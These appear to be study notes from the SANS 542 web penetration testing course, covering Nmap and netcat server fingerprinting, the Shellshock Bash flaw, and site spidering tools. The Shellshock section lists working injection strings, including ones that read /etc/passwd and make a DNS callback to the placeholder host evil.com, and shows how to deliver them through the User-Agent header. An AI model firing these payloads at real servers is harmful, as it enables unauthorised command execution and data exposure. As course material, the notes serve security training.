SANS 542
2.1: Nmap
2.1.1: NSE, -O (operating system) and -sV (service version) detection
2.1.2: example of scanning scanme.nmap.org
2.1.3: Server profiling: find out version of web server, SSL, load balancing, etc.
2.1.4: Finding server version through different methods
2.1.5: Nmap, use -sV
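A minimal sketch combining the flags above, aimed at Nmap's sanctioned test host (-O requires root):

```shell
# -sV probes open ports for service/version banners
# -O fingerprints the TCP/IP stack to guess the operating system (needs root)
nmap -sV -O scanme.nmap.org
```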
2.1.6: Use netcat to get server connection strings and HTTP headers
2.1.7: Netcat example of true and false server headers
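A hedged sketch of grabbing headers by hand; example.com stands in for the target host:

```shell
# Craft a minimal HTTP request; piping it into nc dumps the raw response
# headers, including the (possibly spoofed) Server string.
printf 'HEAD / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n' |
  nc example.com 80
```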
2.1.8: Look up website on Netcraft
2.1.9: More in depth detail from Netcraft: headers, netblock info, ownership info
2.4: Shellshock
2.4.1: Important to look for software configuration flaws, using e.g. Nikto
2.4.2: 2014 was a notable year for vulns: Heartbleed, Shellshock and Drupalgeddon
2.4.3: Shellshock arose from the way Bash handled functions defined within
environment variables and exported to child processes, which would import them
and run arbitrary trailing commands.
2.4.4: Remotely exploitable: the adversary interacts with the server, input from
the connection is placed by the server into Bash environment variables, and the
adversary controls that input, so can cause commands to be executed.
2.4.5: On the web, CGI scripts can use #!/bin/bash, and /bin/sh is often a pointer
to /bin/bash. Functions backed by popen() or system() are also vulnerable in apps
written in Python, PHP and other interpreted languages.
2.4.6: Injection strings (first two direct injection, last two blind injection):
() { 42;};echo;/bin/cat /etc/passwd
() { 42;};echo;/usr/bin/id
() { 42;};echo; ping -c 4 10.42.42.42
() { 42;};echo; nslookup abc123.evil.com
2.4.7: These can go in User-Agent, Cookie or Referer headers. The () { 42;} prefix
indicates a function stored in an env variable. Inside the curly braces is what the
function will do; the 42 is arbitrary as it never gets executed (a colon works just
as well). The echo is padding - not always necessary for Shellshock, but for
HTTP headers it reduces the likelihood of a server error. The last part is the command.
2.4.8: Bash continues parsing past the ;} and executes what it finds (this is the
flaw)
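The classic local check makes the flaw in 2.4.8 visible; on a patched bash the trailing command is ignored:

```shell
# Export a function-shaped variable with a trailing command, then start bash.
# An unpatched bash prints "vulnerable" before "this is a test";
# a patched bash prints only "this is a test".
env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'
```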
2.4.9: Visualisation of shellshock injection
2.5: Exercise: Shellshock, using Burp to intercept and change the User-Agent
string. Also use curl to set the User-Agent.
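A hedged sketch of the curl variant, reusing an injection string from 2.4.6; http://target/cgi-bin/status is a hypothetical vulnerable CGI endpoint:

```shell
# Injection string delivered via the User-Agent header.
UA='() { 42;};echo;/usr/bin/id'
echo "User-Agent: $UA"
# To fire it at a target (requires a reachable vulnerable host):
#   curl -s -A "$UA" http://target/cgi-bin/status
```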
2.6: Spidering web applications.
2.6.1: Spidering is an important information-gathering activity according to the
OWASP Testing Guide (OTG)
2.6.2: Involves following links to download the site, then analysing it offline to
find security weaknesses in code, contact details, keywords for password guessing,
confidential data etc.
2.6.3: Common to spider multiple times as you need a map of the site. Automated
tools may fail if the site is complex or has issues with multiple requests, so you
might have to do it manually.
2.6.4: Robots.txt can tell spiders what they're allowed to access based on user-
agent. Meta tags can also be placed on pages: the first two below stop caching
(both are needed as they're respected by different clients), the second two
control search engine spiders.
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta name="robots" content="index,nofollow">
<meta name="googlebot" content="noarchive">
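A hypothetical robots.txt to go with this; the paths are illustrative only, and note that a hostile spider is free to ignore (or deliberately visit) the disallowed entries:

```
User-agent: *
Disallow: /admin/
Disallow: /backup/
```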
2.6.5: ZAP can spider websites (select Attack -> Spider). Client-side dynamically
generated links can be missed, so a separate dedicated AJAX spider can be employed.
2.6.6: ZAP example.
2.6.7: Wappalyzer can provide insight into OS, web server, web apps, languages,
frameworks and APIs leveraged.
2.6.8: The Wappalyzer browser extension shows icons for the technologies in use.
Beware: it sends data back to the Wappalyzer website.
2.6.9: ZAP has a "Technology Detection" extension that implements the Wappalyzer
code, but it's not release quality and doesn't implement all functionality, as a
browser is required for some of it.
2.6.10: It's a marketplace extension and creates a new tab. Example illustrated.
2.6.11: ZAP forced browse, based on the (now inactive) DirBuster, does a brute-
force browse using a wordlist. Can do it for a site, a directory, or a directory
and its children.
2.6.12: Burp can spider similarly to ZAP: use the Spider tab and "spider running",
or right-click the target and click "spider this host"
2.6.13: Can use wget: respects robots.txt, -r will recurse through discovered links
and -l can set recursion depth
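A sketch of the wget variant; example.com is a placeholder target:

```shell
# Recurse through discovered links, limited to two levels deep;
# wget honours robots.txt by default.
wget -r -l 2 http://example.com/
```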
2.6.14: Specialized spidering tools are available: CeWL (https://digi.ninja)
spiders a site and then creates a word list for dictionary attacks; it can also
pull words from EXIF data.
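A hedged sketch of a CeWL run (flags as per its help output; example.com is a placeholder target):

```shell
# Spider two links deep, keep words of 6+ characters, write them to a
# wordlist; -a also mines document metadata (e.g. EXIF fields) for words.
cewl -d 2 -m 6 -a -w wordlist.txt http://example.com/
```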